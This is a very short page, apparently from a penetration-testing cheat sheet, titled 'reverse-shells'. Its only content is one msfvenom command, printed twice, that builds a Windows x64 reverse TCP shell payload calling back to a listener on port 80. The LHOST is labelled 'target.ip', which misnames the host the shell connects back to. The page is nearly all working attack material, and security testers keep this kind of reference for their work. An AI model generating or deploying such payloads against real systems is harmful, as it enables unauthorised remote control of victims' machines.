reverse-shells
using msfvenom
msfvenom -p windows/shell/reverse_tcp LHOST=target.ip LPORT=80 --platform windows -a x64
Last updated
Was this helpful?
msfvenom -p windows/shell/reverse_tcp LHOST=target.ip LPORT=80 --platform windows -a x64
Last updated
Was this helpful?